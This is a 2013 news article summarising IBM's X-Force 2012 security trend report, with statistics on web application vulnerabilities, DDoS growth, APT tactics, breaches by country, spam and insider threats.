IBM: Web Application Vulnerabilities Threaten The Enterprise

By | April 03, 2013

Posted in: Network Security Trends

Web application vulnerabilities remained one of enterprises most pressing issues, rising 14% in 2012  over 2011 end of year numbers, according to a recent report.

These vulnerabilities were exploited by attackers who, more often then not, injected malicious scripts and executables onto legitimate websites, targeting client side vulnerabilities in the browser core and in plugins such as those in Internet Explorer and Java, found the report.

This topped the long list of findings of the IBM X-Force 2012 Annual Trend and Risk Report, a nearly 100-page dispatch highlighting the annual work of IBM’s security team. They culled information from a variety of resources, including their database of more than 70,000 computer security vulnerabilities, a global Web crawler and their international spam collectors to present a comprehensive look at the “year in global security threats.”

Leslie Horacek, IBM X-Force Threat Response Manager, said in a blog post unveiling the findings that attackers were, by targeting vulnerabilities in cross platform networks, achieving more bang for their exploit development buck.

"Looking back over the year, there was a measurable increase in the public announcements of security incidents and breaches, where SQL injection and DDoS attacks continued to wreak havoc on IT infrastructures," she wrote. "Over the past year the discovery of sophisticated toolkits with ominous names like Flame to cross-platform zero-day vulnerabilities, had both consumers and corporations inundated with advisories and alerts regarding emerging threats. The frequency of data breaches and incidents -- which had already hit a new high in 2011 -- continued their upward trajectory."

Going all the way back to the middle of last year, the Distributed Denial of Service (DDoS) attack has been generating headlines, culminating in last week's mammoth Spamhaus episode.

IBM's report showed that these expansive attacks continue to grow, seeing an enormous increase in denial of service traffic volumes using up to 60 to 70 Gbps of data driven by compromised higher bandwidth web servers instead of PCs, according to the report.

Another buzz word from 2012, the advanced persistent threat (APT), proved to be a bit of an enigma. IBM's team found that these persistent threats were really not so advanced at all.

"While media headlines are dominated by the achievements of suspected state-sponsored groups and advanced tactics used to breach high profile organizations, more often than not, these efforts follow a path of least resistance and rely on simpler, tried-and-true methods rather than zero-day attacks and sophisticated malware," wrote Horacek in the blog post. "Advanced persistent threats, while persistent, did not always use advanced technical approaches such as zero-day exploits and self-modifying malware."

Some additional key findings:

The US was the land of the breach: The United States had the most breaches, at 46%. The United Kingdom was second at 8% of total incidents, with Australia and India tied for third at 3%.

Spam is on the retreat: Spam volume remained nearly flat in 2012. India remains the top country for distributing spam, sending out more than 20 percent of all spam in the autumn of 2012. Following India was the United States where more than 8 percent of all spam was generated in the second half of the year.

Vulnerabilities on the rise: 2012 saw 8,168 publicly disclosed vulnerabilities -- an increase of over 14 percent over 2011. Web application vulnerabilities surged 14 percent from 2,921 vulnerabilities in 2011 to 3,551 vulnerabilities in 2012. Cross-site scripting vulnerabilities accounted for 53 percent of all web application vulnerabilities disclosed in 2012. There were 3,436 public exploits in 2012 (42 percent of the total number of vulnerabilities, up 4 percent from 2011 levels).

Social media interconnection plagues the enterprise: Attackers can leverage social media to define enterprises as a collection of personalities. This gives attackers the opportunity to target specific people rather than enterprise infrastructures or applications. Furthermore, targeted people may also be targeted as individuals and not just as employees. In other words, the personal activities and lives of employees can be leveraged to target an enterprise.

Mobile will be just...fine: The IBM security team predicts that, based on security measures already undertaken, mobile computing devices should be more secure than traditional user computing devices by 2014.

The IBM team singled out "insider threats" as one of more impactful issues facing the enterprise, citing a joint IBM/Ponemon study of C-level executives that identified negligent insiders as the greatest risk to sensitive data.

The report suggests that by employing access governance and security information and event management (SIEM) solutions, the enterprise can better monitor and control user access activities, identify anomalies and misuse of assets, and demonstrate compliance in the new perimeter-less workplace.

A full copy of the report can be downloaded HERE.

You May Also Be Interested In: